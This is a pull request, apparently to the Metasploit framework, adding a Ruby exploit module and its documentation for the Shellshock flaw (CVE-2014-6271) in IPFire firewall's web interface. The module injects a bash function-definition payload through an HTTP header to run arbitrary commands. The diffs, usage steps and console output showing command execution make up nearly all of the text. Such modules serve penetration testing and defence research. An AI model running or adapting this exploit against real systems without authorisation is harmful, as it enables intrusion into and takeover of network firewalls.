### PR TITLE
IPFire shellshock exploit

### DIFF
--- a/documentation/modules/exploit/linux/http/ipfire_bashbug_exec.md
+++ b/documentation/modules/exploit/linux/http/ipfire_bashbug_exec.md
@@ -1,0 +1,47 @@
+The following is the recommended format for module documentation.
+But feel free to add more content/sections to this.
+
+
+## Vulnerable Application
+
+  Official Source: [ipfire](http://downloads.ipfire.org/releases/ipfire-2.x/2.15-core82/ipfire-2.15.i586-full-core82.iso)
+  Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)
+
+## Verification Steps
+
+  Example steps in this format:
+
+  1. Install the firewall
+  2. Start msfconsole
+  3. Do: ```use exploit/linux/http/ipfire_bashbug_exec```
+  4. Do: ```set rhost 10.10.10.10```
+  5. Do: ```set CMD ls```
+  6. Do: ```run```
+  7. You should see the output of the command that was run.
+
+## Options
+
+  **PASSWORD**
+
+  Password is set at install.  May be blank, 'admin', or 'ipfire'.
+  
+  **CMD**
+  
+  This is the command to run on the system.
+
+## Scenarios
+
+  Example of running the ID command
+  ```
+    msf > use exploit/linux/http/ipfire_bashbug_exec 
+    msf exploit(ipfire_bashbug_exec) > set PASSWORD admin
+    PASSWORD => admin
+    msf exploit(ipfire_bashbug_exec) > set rhost 192.168.2.202
+    rhost => 192.168.2.202
+    msf exploit(ipfire_bashbug_exec) > set CMD id
+    CMD => id
+    msf exploit(ipfire_bashbug_exec) > exploit
+    
+    [+] uid=99(nobody) gid=99(nobody) groups=16(dialout),23(squid),99(nobody)
+    [*] Exploit completed, but no session was created.
+  ```

--- a/documentation/modules/exploit/linux/http/ipfire_bashbug_exec.md
+++ b/documentation/modules/exploit/linux/http/ipfire_bashbug_exec.md
@@ -1,7 +1,3 @@
-The following is the recommended format for module documentation.
-But feel free to add more content/sections to this.
-
-
 ## Vulnerable Application
 
   Official Source: [ipfire](http://downloads.ipfire.org/releases/ipfire-2.x/2.15-core82/ipfire-2.15.i586-full-core82.iso)
@@ -9,15 +5,14 @@ But feel free to add more content/sections to this.
 
 ## Verification Steps
 
-  Example steps in this format:
-
   1. Install the firewall
   2. Start msfconsole
   3. Do: ```use exploit/linux/http/ipfire_bashbug_exec```
   4. Do: ```set rhost 10.10.10.10```
-  5. Do: ```set CMD ls```
-  6. Do: ```run```
-  7. You should see the output of the command that was run.
+  5. Do: ```set PASSWORD admin```
+  6. Do: ```set CMD ls```
+  7. Do: ```run```
+  8. You should see the output of the command that was run.
 
 ## Options
 

--- a/modules/exploits/linux/http/ipfire_bashbug_exec.rb
+++ b/modules/exploits/linux/http/ipfire_bashbug_exec.rb
@@ -25,7 +25,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ],
         'References'     =>
           [
-            [ 'URL', 'https://www.exploit-db.com/exploits/34839/' ],
+            [ 'EDB', '34839' ],
             [ 'CVE', '2014-6271']
           ],
         'License'        => MSF_LICENSE,

--- a/modules/exploits/linux/http/ipfire_bashbug_exec.rb
+++ b/modules/exploits/linux/http/ipfire_bashbug_exec.rb
@@ -25,7 +25,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'References'      =>
         [
           [ 'URL', 'https://www.exploit-db.com/exploits/34839/' ],
-          [ 'CVE', 'CVE-2014-6271']
+          [ 'CVE', '2014-6271']
         ],
       'License'        => MSF_LICENSE,
       'Platform'       => %w{ linux unix },
@@ -70,7 +70,7 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
       fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code == 401
       /\<strong\>IPFire (?<version>[\d.]{4}) \([\w]+\) - Core Update (?<update>[\d]+)/ =~ res.body
-      
+
       if version && update && version == "2.15" && update.to_i < 83
         Exploit::CheckCode::Vulnerable
       else
@@ -98,7 +98,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'authorization' => basic_auth(datastore['USERNAME'],datastore['PASSWORD']),
         'headers'   => {'VULN' => payload}
       })
-      
+
       fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
       fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code == 401
       /<li>Device: \/dev\/(?<output>.+) reports/m =~ res.body

--- a/modules/exploits/linux/http/ipfire_bashbug_exec.rb
+++ b/modules/exploits/linux/http/ipfire_bashbug_exec.rb
@@ -1,0 +1,113 @@
+##
+## This module requires Metasploit: http://metasploit.com/download
+## Current source: https://github.com/rapid7/metasploit-framework
+###
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'IPFire Bash Environment Variable Injection (Shellshock)',
+      'Description' => %q{
+        IPFire, a free linux based open source firewall distribution,
+        version <= 2.15 Update Core 82 contains an authenticated remote
+        command execution vulnerability via shellshock in the request headers.
+      },
+      'Author'      =>
+        [
+          'h00die <mike@stcyrsecurity.com>', # module
+          'Claudio Viviani'                  # discovery
+        ],
+      'References'      =>
+        [
+          [ 'URL', 'https://www.exploit-db.com/exploits/34839/' ],
+          [ 'CVE', 'CVE-2014-6271']
+        ],
+      'License'        => MSF_LICENSE,
+      'Platform'       => %w{ linux unix },
+      'Privileged'     => false,
+      'DefaultOptions' =>
+        {
+          'SSL' => true,
+          'PAYLOAD' => 'cmd/unix/generic'
+        },
+      'Arch'           => ARCH_CMD,
+      'Payload'        =>
+        {
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd',
+              'RequiredCmd' => 'generic'
+            }
+        },
+      'Targets'        =>
+        [
+          [ 'Automatic Target', { }]
+        ],
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'Sep 29 2014'
+     ))
+
+    register_options(
+      [
+        OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
+        OptString.new('PASSWORD', [ false, 'Password to login with', '']),
+        Opt::RPORT(444)
+      ], self.class)
+  end
+
+  def check()
+    begin
+      res = send_request_cgi({
+        'uri'       => '/cgi-bin/index.cgi',
+        'method'    => 'GET',
+        'authorization' => basic_auth(datastore['USERNAME'],datastore['PASSWORD']),
+      })
+      fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
+      fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code == 401
+      /\<strong\>IPFire (?<version>[\d.]{4}) \([\w]+\) - Core Update (?<update>[\d]+)/ =~ res.body
+      
+      if version && update && version == "2.15" && update.to_i < 83
+        Exploit::CheckCode::Vulnerable
+      else
+        Exploit::CheckCode::Safe
+      end
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+  end
+
+  #
+  # CVE-2014-6271
+  #
+  def cve_2014_6271(cmd)
+    %{() { :;}; /bin/bash -c "#{cmd}" }
+  end
+
+  def exploit()
+    begin
+      payload = cve_2014_6271(datastore['CMD'])
+      vprint_status("Exploiting with payload: #{payload}" )
+      res = send_request_cgi({
+        'uri'       => '/cgi-bin/index.cgi',
+        'method'    => 'GET',
+        'authorization' => basic_auth(datastore['USERNAME'],datastore['PASSWORD']),
+        'headers'   => {'VULN' => payload}
+      })
+      
+      fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
+      fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code == 401
+      /<li>Device: \/dev\/(?<output>.+) reports/m =~ res.body
+      if output
+        print_good(output)
+      end
+
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+  end
+end

--- a/modules/exploits/linux/http/ipfire_bashbug_exec.rb
+++ b/modules/exploits/linux/http/ipfire_bashbug_exec.rb
@@ -6,73 +6,75 @@
 require 'msf/core'
 
 class MetasploitModule < Msf::Exploit::Remote
-
   include Msf::Exploit::Remote::HttpClient
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'        => 'IPFire Bash Environment Variable Injection (Shellshock)',
-      'Description' => %q{
-        IPFire, a free linux based open source firewall distribution,
-        version <= 2.15 Update Core 82 contains an authenticated remote
-        command execution vulnerability via shellshock in the request headers.
-      },
-      'Author'      =>
-        [
-          'h00die <mike@stcyrsecurity.com>', # module
-          'Claudio Viviani'                  # discovery
-        ],
-      'References'      =>
-        [
-          [ 'URL', 'https://www.exploit-db.com/exploits/34839/' ],
-          [ 'CVE', '2014-6271']
-        ],
-      'License'        => MSF_LICENSE,
-      'Platform'       => %w{ linux unix },
-      'Privileged'     => false,
-      'DefaultOptions' =>
-        {
-          'SSL' => true,
-          'PAYLOAD' => 'cmd/unix/generic'
-        },
-      'Arch'           => ARCH_CMD,
-      'Payload'        =>
-        {
-          'Compat'      =>
-            {
-              'PayloadType' => 'cmd',
-              'RequiredCmd' => 'generic'
-            }
-        },
-      'Targets'        =>
-        [
-          [ 'Automatic Target', { }]
-        ],
-      'DefaultTarget' => 0,
-      'DisclosureDate' => 'Sep 29 2014'
-     ))
+    super(
+      update_info(
+        info,
+        'Name'          => 'IPFire Bash Environment Variable Injection (Shellshock)',
+        'Description'   => %q(
+          IPFire, a free linux based open source firewall distribution,
+          version <= 2.15 Update Core 82 contains an authenticated remote
+          command execution vulnerability via shellshock in the request headers.
+        ),
+        'Author'         =>
+          [
+            'h00die <mike@stcyrsecurity.com>', # module
+            'Claudio Viviani'                  # discovery
+          ],
+        'References'     =>
+          [
+            [ 'URL', 'https://www.exploit-db.com/exploits/34839/' ],
+            [ 'CVE', '2014-6271']
+          ],
+        'License'        => MSF_LICENSE,
+        'Platform'       => %w( linux unix ),
+        'Privileged'     => false,
+        'DefaultOptions' =>
+          {
+            'SSL' => true,
+            'PAYLOAD' => 'cmd/unix/generic'
+          },
+        'Arch'           => ARCH_CMD,
+        'Payload'        =>
+          {
+            'Compat' =>
+              {
+                'PayloadType' => 'cmd',
+                'RequiredCmd' => 'generic'
+              }
+          },
+        'Targets'        =>
+          [
+            [ 'Automatic Target', {}]
+          ],
+        'DefaultTarget'  => 0,
+        'DisclosureDate' => 'Sep 29 2014'
+      )
+    )
 
     register_options(
       [
         OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
         OptString.new('PASSWORD', [ false, 'Password to login with', '']),
         Opt::RPORT(444)
-      ], self.class)
+      ], self.class
+    )
   end
 
-  def check()
+  def check
     begin
-      res = send_request_cgi({
+      res = send_request_cgi(
         'uri'       => '/cgi-bin/index.cgi',
-        'method'    => 'GET',
-        'authorization' => basic_auth(datastore['USERNAME'],datastore['PASSWORD']),
-      })
+        'method'    => 'GET'
+      )
       fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
       fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code == 401
       /\<strong\>IPFire (?<version>[\d.]{4}) \([\w]+\) - Core Update (?<update>[\d]+)/ =~ res.body
 
       if version && update && version == "2.15" && update.to_i < 83
-        Exploit::CheckCode::Vulnerable
+        Exploit::CheckCode::Appears
       else
         Exploit::CheckCode::Safe
       end
@@ -88,23 +90,20 @@ class MetasploitModule < Msf::Exploit::Remote
     %{() { :;}; /bin/bash -c "#{cmd}" }
   end
 
-  def exploit()
+  def exploit
     begin
       payload = cve_2014_6271(datastore['CMD'])
-      vprint_status("Exploiting with payload: #{payload}" )
-      res = send_request_cgi({
+      vprint_status("Exploiting with payload: #{payload}")
+      res = send_request_cgi(
         'uri'       => '/cgi-bin/index.cgi',
         'method'    => 'GET',
-        'authorization' => basic_auth(datastore['USERNAME'],datastore['PASSWORD']),
-        'headers'   => {'VULN' => payload}
-      })
+        'headers'   => { 'VULN' => payload }
+      )
 
       fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
       fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code == 401
       /<li>Device: \/dev\/(?<output>.+) reports/m =~ res.body
-      if output
-        print_good(output)
-      end
+      print_good(output) unless output.nil?
 
     rescue ::Rex::ConnectionError
       fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")


### PR DESCRIPTION
Adds an exploit module to take advantage of the shellshock vulnerability in IPFire's web interface.  This is a ruby rewrite of the python module from exploit-db. 

iso is avail at http://downloads.ipfire.org/releases/ipfire-2.x/2.15-core82/ipfire-2.15.i586-full-core82.iso
## Verification

List the steps needed to make sure this thing works
- [x] Start `msfconsole`
- [x] `use exploit/linux/http/ipfire_bashbug_exec`
- [x] `set rhost x.x.x.x`
- [x] `set PASSWORD admin`
- [x] `set CMD id`
- [x] `check`

<del>
[+] The target is vulnerable.
</del>

```
[+] The target appears vulnerable.
```
- [x] `exploit`
- [x] **Verify** the thing does what it should

```
[+] uid=99(nobody) gid=99(nobody) groups=16(dialout),23(squid),99(nobody)
[*] Exploit completed, but no session was created.
```
- [ ] **Verify** the thing does not do what it should not

```
[-] Exploit aborted due to failure: unreachable: 10.10.1.10:444 - Could not connect to the web service 
```

or

```
[-] Exploit aborted due to failure: unexpected-reply: 192.168.2.202:444 - Invalid credentials (response code: 401)
```
